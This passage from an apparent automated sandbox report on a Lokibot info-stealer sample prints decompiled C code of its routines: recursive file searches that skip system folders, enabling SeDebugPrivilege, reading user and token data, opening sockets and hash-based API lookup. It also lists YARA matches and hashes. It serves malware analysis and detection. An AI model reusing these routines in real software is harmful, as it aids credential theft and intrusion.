                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.643480909.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >

                          Executed Functions

                          C-Code - Quality: 85%
                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				struct _WIN32_FIND_DATAW _v596;
                          				void* __ebx;
                          				void* _t35;
                          				int _t43;
                          				void* _t52;
                          				int _t56;
                          				intOrPtr _t60;
                          				void* _t66;
                          				void* _t73;
                          				void* _t74;
                          				WCHAR* _t98;
                          				void* _t99;
                          				void* _t100;
                          				void* _t101;
                          				WCHAR* _t102;
                          				void* _t103;
                          				void* _t104;
                          
                          				L004067C4(0xa); // executed
                          				_t72 = 0;
                          				_t100 = 0x2e;
                          				_t106 = _a16;
                          				if(_a16 == 0) {
                          					L15:
                          					_push(_a8);
                          					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                          					_t104 = _t103 + 0xc;
                          					if(_t98 == 0) {
                          						L30:
                          						__eflags = 0;
                          						return 0;
                          					}
                          					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                          					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                          					_t73 = _t35;
                          					if(_t73 == 0xffffffff) {
                          						L29:
                          						E00402BAB(_t98);
                          						goto L30;
                          					}
                          					L17:
                          					while(1) {
                          						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                          							if(_v596.dwFileAttributes != 0x10) {
                          								L21:
                          								_push( &(_v596.cFileName));
                          								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                          								_t104 = _t104 + 0xc;
                          								if(_t101 == 0) {
                          									goto L24;
                          								}
                          								if(_a12 == 0) {
                          									E00402BAB(_t98);
                          									E00403BEF(_t73);
                          									return _t101;
                          								}
                          								_a12(_t101);
                          								E00402BAB(_t101);
                          								goto L24;
                          							}
                          							_t124 = _a20;
                          							if(_a20 == 0) {
                          								goto L24;
                          							}
                          							goto L21;
                          						} else {
                          							L24:
                          							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                          							_t43 = FindNextFileW(_t73,  &_v596); // executed
                          							if(_t43 == 0) {
                          								E00403BEF(_t73); // executed
                          								goto L29;
                          							}
                          							_t100 = 0x2e;
                          							continue;
                          						}
                          					}
                          				}
                          				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                          				if(_t102 == 0) {
                          					L14:
                          					_t100 = 0x2e;
                          					goto L15;
                          				}
                          				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                          				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                          				_t74 = _t52;
                          				if(_t74 == 0xffffffff) {
                          					L13:
                          					E00402BAB(_t102);
                          					_t72 = 0;
                          					goto L14;
                          				} else {
                          					goto L3;
                          				}
                          				do {
                          					L3:
                          					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                          						goto L11;
                          					}
                          					if(_a24 == 0) {
                          						L7:
                          						if(E00405D24( &(_v596.cFileName)) >= 3) {
                          							L9:
                          							_push( &(_v596.cFileName));
                          							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                          							_t103 = _t103 + 0xc;
                          							_a16 = _t60;
                          							_t115 = _t60;
                          							if(_t60 == 0) {
                          								goto L11;
                          							}
                          							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                          							E00402BAB(_a16);
                          							_t103 = _t103 + 0x1c;
                          							if(_t99 != 0) {
                          								E00402BAB(_t102);
                          								E00403BEF(_t74);
                          								return _t99;
                          							}
                          							goto L11;
                          						}
                          						_t66 = 0x2e;
                          						_t114 = _v596.cFileName - _t66;
                          						if(_v596.cFileName == _t66) {
                          							goto L11;
                          						}
                          						goto L9;
                          					}
                          					_push(L"Windows");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					_push(L"Program Files");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					goto L7;
                          					L11:
                          					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                          					_t56 = FindNextFileW(_t74,  &_v596); // executed
                          				} while (_t56 != 0);
                          				E00403BEF(_t74); // executed
                          				goto L13;
                          			}




















                          0x00403d82
                          0x00403d88
                          0x00403d8c
                          0x00403d8d
                          0x00403d90
                          0x00403ea9
                          0x00403ea9
                          0x00403eb9
                          0x00403ebb
                          0x00403ec0
                          0x00403f95
                          0x00403f95
                          0x00000000
                          0x00403f95
                          0x00403ece
                          0x00403edb
                          0x00403edd
                          0x00403ee2
                          0x00403f8e
                          0x00403f8f
                          0x00000000
                          0x00403f94
                          0x00000000
                          0x00403ee8
                          0x00403ef8
                          0x00403f0a
                          0x00403f12
                          0x00403f18
                          0x00403f26
                          0x00403f28
                          0x00403f2d
                          0x00000000
                          0x00000000
                          0x00403f33
                          0x00403f76
                          0x00403f7c
                          0x00000000
                          0x00403f83
                          0x00403f36
                          0x00403f3a
                          0x00000000
                          0x00403f40
                          0x00403f0c
                          0x00403f10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403f41
                          0x00403f41
                          0x00403f4b
                          0x00403f58
                          0x00403f5c
                          0x00403f88
                          0x00000000
                          0x00403f8d
                          0x00403f60
                          0x00000000
                          0x00403f60
                          0x00403ef8
                          0x00403ee8
                          0x00403da3
                          0x00403da9
                          0x00403ea6
                          0x00403ea8
                          0x00000000
                          0x00403ea8
                          0x00403db7
                          0x00403dc4
                          0x00403dc6
                          0x00403dcb
                          0x00403e9d
                          0x00403e9e
                          0x00403ea4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403dd1
                          0x00403dd1
                          0x00403dd8
                          0x00000000
                          0x00000000
                          0x00403de2
                          0x00403e12
                          0x00403e22
                          0x00403e30
                          0x00403e36
                          0x00403e3f
                          0x00403e44
                          0x00403e47
                          0x00403e4a
                          0x00403e4c
                          0x00000000
                          0x00000000
                          0x00403e63
                          0x00403e65
                          0x00403e6a
                          0x00403e6f
                          0x00403f64
                          0x00403f6a
                          0x00000000
                          0x00403f71
                          0x00000000
                          0x00403e6f
                          0x00403e26
                          0x00403e27
                          0x00403e2e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e2e
                          0x00403dea
                          0x00403df9
                          0x00000000
                          0x00000000
                          0x00403e01
                          0x00403e10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e75
                          0x00403e7f
                          0x00403e8c
                          0x00403e8e
                          0x00403e97
                          0x00000000

                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID: %s\%s$%s\*$Program Files$Windows
                          • API String ID: 1690352074-2009209621
                          • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                          • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                          				void* _v8;
                          				struct _LUID _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				struct _TOKEN_PRIVILEGES _v32;
                          				intOrPtr* _t13;
                          				void* _t14;
                          				int _t16;
                          				int _t31;
                          				void* _t32;
                          
                          				_t31 = 0;
                          				E004060AC();
                          				_t32 = __eax;
                          				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          				_t14 =  *_t13(_t32, 0x28,  &_v8);
                          				if(_t14 != 0) {
                          					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                          					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                          					if(_t16 != 0) {
                          						_push(__ebx);
                          						_v32.Privileges = _v16.LowPart;
                          						_v32.PrivilegeCount = 1;
                          						_v24 = _v16.HighPart;
                          						_v20 = 2;
                          						E004031E5(1, 9, 0xc1642df2, 0, 0);
                          						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                          						_t31 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_v8);
                          					return _t31;
                          				}
                          				return _t14;
                          			}













                          0x00406512
                          0x00406514
                          0x00406522
                          0x00406524
                          0x00406530
                          0x00406534
                          0x0040653f
                          0x0040654e
                          0x00406552
                          0x0040655a
                          0x0040655f
                          0x0040656d
                          0x00406570
                          0x00406573
                          0x0040657a
                          0x00406589
                          0x0040658d
                          0x00406590
                          0x00406594
                          0x00000000
                          0x0040659a
                          0x004065a1

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                          • String ID: SeDebugPrivilege
                          • API String ID: 3615134276-2896544425
                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402B7C(long _a4) {
                          				void* _t4;
                          				void* _t7;
                          
                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                          				_t7 = _t4;
                          				if(_t7 != 0) {
                          					E00402B4E(_t7, 0, _a4);
                          				}
                          				return _t7;
                          			}





                          0x00402b8c
                          0x00402b92
                          0x00402b96
                          0x00402b9e
                          0x00402ba3
                          0x00402baa

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406069(WCHAR* _a4, DWORD* _a8) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                          				_t4 = GetUserNameW(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x00406077
                          0x00406082
                          0x00406085

                          APIs
                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                          				int _v8;
                          				long _v12;
                          				int _v16;
                          				int _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				intOrPtr* _t25;
                          				int _t27;
                          				int _t30;
                          				int _t31;
                          				int _t36;
                          				int _t37;
                          				intOrPtr* _t39;
                          				int _t40;
                          				long _t44;
                          				intOrPtr* _t45;
                          				int _t46;
                          				void* _t48;
                          				int _t49;
                          				void* _t67;
                          				void* _t68;
                          				void* _t74;
                          
                          				_t48 = __ebx;
                          				_t67 = 0;
                          				_v8 = 0;
                          				E00402BF2();
                          				_t68 = __eax;
                          				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                          				_t2 =  &_v8; // 0x414449
                          				_push(1);
                          				_push(8);
                          				_push(_t68);
                          				if( *_t25() != 0) {
                          					L4:
                          					_t27 = E00402B7C(0x208);
                          					_v20 = _t27;
                          					__eflags = _t27;
                          					if(_t27 != 0) {
                          						E0040338C(_t27, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_push(_t48);
                          					_t49 = E00402B7C(0x208);
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E0040338C(_t49, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_v28 = 0x208;
                          					_v24 = 0x208;
                          					_t7 =  &_v8; // 0x414449
                          					_v12 = _t67;
                          					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                          					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                          					__eflags = _t30;
                          					if(_t30 == 0) {
                          						_t36 = E00402B7C(_v12);
                          						_v16 = _t36;
                          						__eflags = _t36;
                          						if(_t36 != 0) {
                          							_t14 =  &_v8; // 0x414449, executed
                          							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                          								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                          								__eflags = _t40;
                          								if(__eflags != 0) {
                          									_t67 = E00405B6F(__eflags, L"%s", _t49);
                          								}
                          							}
                          							E00402BAB(_v16);
                          						}
                          					}
                          					__eflags = _v8;
                          					if(_v8 != 0) {
                          						E00403C40(_v8); // executed
                          					}
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E00402BAB(_t49);
                          					}
                          					_t31 = _v20;
                          					__eflags = _t31;
                          					if(_t31 != 0) {
                          						E00402BAB(_t31);
                          					}
                          					return _t67;
                          				}
                          				_t44 = GetLastError();
                          				if(_t44 == 0x3f0) {
                          					E004060AC();
                          					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          					_t3 =  &_v8; // 0x414449
                          					_t46 =  *_t45(_t44, 8, _t3);
                          					__eflags = _t46;
                          					if(_t46 == 0) {
                          						goto L2;
                          					}
                          					goto L4;
                          				}
                          				L2:
                          				return 0;
                          			}


























                          0x004061c3
                          0x004061cb
                          0x004061cd
                          0x004061d0
                          0x004061de
                          0x004061e0
                          0x004061e5
                          0x004061e9
                          0x004061eb
                          0x004061ed
                          0x004061f2
                          0x0040622a
                          0x00406230
                          0x00406235
                          0x00406239
                          0x0040623b
                          0x00406244
                          0x00406249
                          0x00406249
                          0x0040624c
                          0x00406253
                          0x00406256
                          0x00406258
                          0x00406261
                          0x00406266
                          0x00406266
                          0x00406270
                          0x00406273
                          0x00406276
                          0x0040627b
                          0x0040627e
                          0x0040628c
                          0x0040628e
                          0x00406290
                          0x00406295
                          0x0040629a
                          0x0040629e
                          0x004062a0
                          0x004062ac
                          0x004062af
                          0x004062b7
                          0x004062b9
                          0x004062c9
                          0x004062e0
                          0x004062e2
                          0x004062e4
                          0x004062f3
                          0x004062f3
                          0x004062e4
                          0x004062f8
                          0x004062fd
                          0x004062a0
                          0x004062fe
                          0x00406302
                          0x00406307
                          0x0040630c
                          0x0040630d
                          0x0040630f
                          0x00406312
                          0x00406317
                          0x00406318
                          0x0040631c
                          0x0040631e
                          0x00406321
                          0x00406326
                          0x00000000
                          0x00406327
                          0x004061f4
                          0x004061ff
                          0x00406208
                          0x00406218
                          0x0040621d
                          0x00406224
                          0x00406226
                          0x00406228
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406228
                          0x00406201
                          0x00000000

                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                          • _wmemset.LIBCMT ref: 00406244
                          • _wmemset.LIBCMT ref: 00406261
                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: _wmemset$ErrorInformationLastToken
                          • String ID: IDA$IDA
                          • API String ID: 487585393-2020647798
                          • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void _v40;
                          				void* _t23;
                          				signed int _t24;
                          				signed int* _t25;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t33;
                          				signed int _t41;
                          				void* _t42;
                          				signed int* _t43;
                          
                          				_v8 = _v8 & 0x00000000;
                          				_t33 = 8;
                          				memset( &_v40, 0, _t33 << 2);
                          				_v32 = 1;
                          				_t23 =  &_v40;
                          				_v28 = 6;
                          				_v36 = 2;
                          				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                          				if(_t23 == 0) {
                          					_t24 = E00402B7C(4);
                          					_t43 = _t24;
                          					_t31 = _t30 | 0xffffffff;
                          					 *_t43 = _t31;
                          					_t41 = _v8;
                          					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30);
                          					 *_t43 = _t24;
                          					if(_t24 != _t31) {
                          						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10)));
                          						if(_t24 == _t31) {
                          							E00404DE5(_t24,  *_t43);
                          							 *_t43 = _t31;
                          						}
                          						__imp__freeaddrinfo(_v8);
                          						if( *_t43 != _t31) {
                          							_t25 = _t43;
                          							goto L10;
                          						} else {
                          							E00402BAB(_t43);
                          							L8:
                          							_t25 = 0;
                          							L10:
                          							return _t25;
                          						}
                          					}
                          					E00402BAB(_t43);
                          					__imp__freeaddrinfo(_v8);
                          					goto L8;
                          				}
                          				return 0;
                          			}

















                          0x00404e1d
                          0x00404e26
                          0x00404e2a
                          0x00404e2f
                          0x00404e37
                          0x00404e3a
                          0x00404e45
                          0x00404e4f
                          0x00404e57
                          0x00404e61
                          0x00404e66
                          0x00404e68
                          0x00404e6c
                          0x00404e6e
                          0x00404e7a
                          0x00404e80
                          0x00404e84
                          0x00404e9f
                          0x00404ea7
                          0x00404eab
                          0x00404eb1
                          0x00404eb1
                          0x00404eb6
                          0x00404ebe
                          0x00404ecb
                          0x00000000
                          0x00404ec0
                          0x00404ec1
                          0x00404ec7
                          0x00404ec7
                          0x00404ecd
                          0x00000000
                          0x00404ece
                          0x00404ebe
                          0x00404e87
                          0x00404e90
                          0x00000000
                          0x00404e90
                          0x00000000

                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 000c2102fd5c5145147978bb4722503be952b71a965646f1e3fd83ce1cd49278
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 000c2102fd5c5145147978bb4722503be952b71a965646f1e3fd83ce1cd49278
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                          				struct _SECURITY_ATTRIBUTES* _v8;
                          				char _v12;
                          				long _v16;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t16;
                          				intOrPtr* _t25;
                          				long* _t28;
                          				void* _t30;
                          				int _t32;
                          				intOrPtr* _t33;
                          				void* _t35;
                          				void* _t42;
                          				intOrPtr _t43;
                          				long _t44;
                          				struct _OVERLAPPED* _t46;
                          
                          				_t46 = 0;
                          				_t35 = 0;
                          				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                          				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                          				_t42 = _t16;
                          				_v8 = _t42;
                          				if(_t42 == 0xffffffff) {
                          					__eflags = _a12;
                          					if(_a12 == 0) {
                          						L10:
                          						return _t35;
                          					}
                          					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                          					__eflags = _t43;
                          					if(_t43 == 0) {
                          						goto L10;
                          					}
                          					_push(0);
                          					__eflags = E00403C59(_a4, _t43);
                          					if(__eflags != 0) {
                          						_v8 = 0;
                          						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                          						_push(_t43);
                          						 *_a8 = _v8;
                          						E00403D44();
                          					}
                          					E00402BAB(_t43);
                          					return _t46;
                          				}
                          				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                          				_t44 =  *_t25(_t42,  &_v12);
                          				if(_v12 != 0 || _t44 > 0x40000000) {
                          					L8:
                          					_t45 = _v8;
                          					goto L9;
                          				} else {
                          					_t28 = _a8;
                          					if(_t28 != 0) {
                          						 *_t28 = _t44;
                          					}
                          					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                          					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                          					_t35 = _t30;
                          					if(_t35 == 0) {
                          						goto L8;
                          					} else {
                          						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                          						_t45 = _v8;
                          						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                          						if(_t32 == 0) {
                          							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                          							 *_t33(_t35, _t46, 0x8000);
                          							_t35 = _t46;
                          						}
                          						L9:
                          						E00403C40(_t45); // executed
                          						goto L10;
                          					}
                          				}
                          			}



















                          0x004040c4
                          0x004040ce
                          0x004040d0
                          0x004040e8
                          0x004040ea
                          0x004040ec
                          0x004040f2
                          0x0040418d
                          0x00404190
                          0x00404184
                          0x00000000
                          0x00404184
                          0x004041a0
                          0x004041a5
                          0x004041a7
                          0x00000000
                          0x00000000
                          0x004041a9
                          0x004041b6
                          0x004041b8
                          0x004041be
                          0x004041cb
                          0x004041d0
                          0x004041d1
                          0x004041d3
                          0x004041d8
                          0x004041dc
                          0x00000000
                          0x004041e2
                          0x00404100
                          0x0040410c
                          0x00404111
                          0x0040417a
                          0x0040417a
                          0x00000000
                          0x0040411b
                          0x0040411b
                          0x00404120
                          0x00404122
                          0x00404122
                          0x0040412c
                          0x0040413a
                          0x0040413c
                          0x00404140
                          0x00000000
                          0x00404142
                          0x0040414a
                          0x00404155
                          0x0040415a
                          0x0040415e
                          0x00404168
                          0x00404174
                          0x00404176
                          0x00404176
                          0x0040417d
                          0x0040417e
                          0x00000000
                          0x00404183
                          0x00404140

                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: File$AllocCreateReadVirtual
                          • String ID: .tmp
                          • API String ID: 3585551309-2986845003
                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00413866(void* __eflags) {
                          				short _v6;
                          				short _v8;
                          				short _v10;
                          				short _v12;
                          				short _v14;
                          				short _v16;
                          				short _v18;
                          				short _v20;
                          				short _v22;
                          				char _v24;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				short _v40;
                          				short _v42;
                          				short _v44;
                          				short _v46;
                          				char _v48;
                          				short _v52;
                          				short _v54;
                          				short _v56;
                          				short _v58;
                          				short _v60;
                          				short _v62;
                          				short _v64;
                          				short _v66;
                          				short _v68;
                          				short _v70;
                          				short _v72;
